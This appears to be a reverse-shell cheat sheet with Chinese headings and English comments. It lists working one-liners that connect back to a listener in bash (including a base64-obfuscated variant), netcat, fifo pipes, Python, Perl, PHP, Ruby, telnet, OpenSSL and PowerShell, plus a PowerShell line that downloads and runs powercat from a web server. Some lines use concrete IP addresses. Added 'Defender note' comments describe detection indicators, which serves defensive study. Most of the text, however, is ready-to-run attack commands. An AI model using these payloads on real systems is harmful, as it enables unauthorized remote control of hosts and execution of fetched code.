开启监听

# Listener side: wait for the inbound connection on TCP 9999.
# -l listen, -vv extra verbose, -p local port; the second form adds -n
# (numeric addresses only, no DNS lookups). Whether -l and -p may be
# combined depends on the netcat build (traditional vs OpenBSD/ncat) —
# verify with the local binary.
# Defender note: an nc process bound to a port on a host that has no
# reason to run netcat is itself a useful detection signal.
nc -lvvp 9999
# or
nc -lvvnp 9999

bash

# Interactive bash with stdout+stderr sent to bash's /dev/tcp pseudo-device
# (>&) and stdin read from the same socket (0>&1); "ip" and "port" are
# placeholders. /dev/tcp is a bash-only feature, not a real device node, so
# this does not work under dash/sh.
# Defender note: a shell process whose fds 0-2 all point at one socket
# (/proc/<pid>/fd, lsof, EDR socket telemetry) is the classic indicator.
bash -i >& /dev/tcp/ip/port 0>&1
# Brace-expansion variant: pipes a base64 blob through "base64 -d" into
# "bash -i"; the blob decodes to the command on the line above.
# Defender note: a rule that only matches the literal "/dev/tcp" string on
# the command line does not see it inside the encoded argument; decode
# base64 arguments before matching.
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC9wb3J0IDA+JjE=}|{base64,-d}|{bash,-i}

nc

nc -e /bin/sh ip port

如果 nc 没有 -e 选项的话

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.204.144 1234 >/tmp/f

exec

exec 5<>/dev/tcp/192.168.204.144/1234;cat <&5|while read line;do $line >&5 2>&1;done

python

python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

perl

# Perl variant: fork() and exit in the parent so the child detaches, open a
# TCP client socket to the listener, re-point STDIN and (via $~, presumably
# the selected output handle, i.e. STDOUT — confirm) at it, then pass every
# received line to system(). The second line is the same one-liner with the
# "ip:port" placeholder replaced by an example address.
# Defender note: the parent exiting immediately means the shell's parent is
# init/systemd, not the process that launched it — look for an orphaned perl
# with a socket on its stdio.
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"174.0.224.117:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

php

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

ruby

ruby -rsocket -e'exit if fork;c=TCPSocket.new("192.168.204.137","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

telnet

telnet 192.168.204.144 4444 | /bin/bash | telnet 192.168.204.144 5555

openssl

# On the attacker host: generate a key and start the listener.
# A throwaway self-signed RSA-4096 certificate (-nodes: key not encrypted,
# -days 365) backs an s_server; -quiet suppresses the session chatter so
# only the shell traffic flows. "port" is a placeholder.
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port port
# On the target host: same fifo pattern as the nc form above, wrapped in TLS.
# "sh -i" reads from /tmp/s, its stdout+stderr go into s_client, s_client's
# socket output is written back into /tmp/s, and the fifo is removed once
# the pipeline exits. x.x.x.x:port is a placeholder.
# Defender note: TLS hides the command stream from network inspection, so
# detection has to lean on endpoint telemetry (sh and openssl s_client
# sharing a fifo) and on the self-signed certificate the server presents.
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect x.x.x.x:port > /tmp/s; rm /tmp/s

powershell (win)

# On the attacker host: run the listener (uses the Powercat script).
# NOTE(review): the only command shown dials out (-c <host> -p <port>) and
# hands "cmd" to the peer (-e), i.e. it is the target-side step the next
# comment describes; the listener this comment announces does not appear on
# the page — the two comments look swapped or a line is missing. The
# IEX(...DownloadString(...)) prefix evaluates powercat.ps1 straight from
# the web server without writing it to disk.
# Defender note: with nothing on disk, PowerShell Script Block Logging and
# AMSI are what see the script content; an outbound connection from
# powershell.exe carrying cmd.exe I/O is the endpoint indicator.
powershell IEX (New-Object System.Net.WebClient).DownloadString('http://x.x.x.x:port/powercat.ps1'); powercat -c x.x.x.x -p port -e cmd
# On the target host: run (assuming the Powercat script can be downloaded
# and executed).

Python 创建伪终端

python -c 'import pty; pty.spawn("/bin/bash")'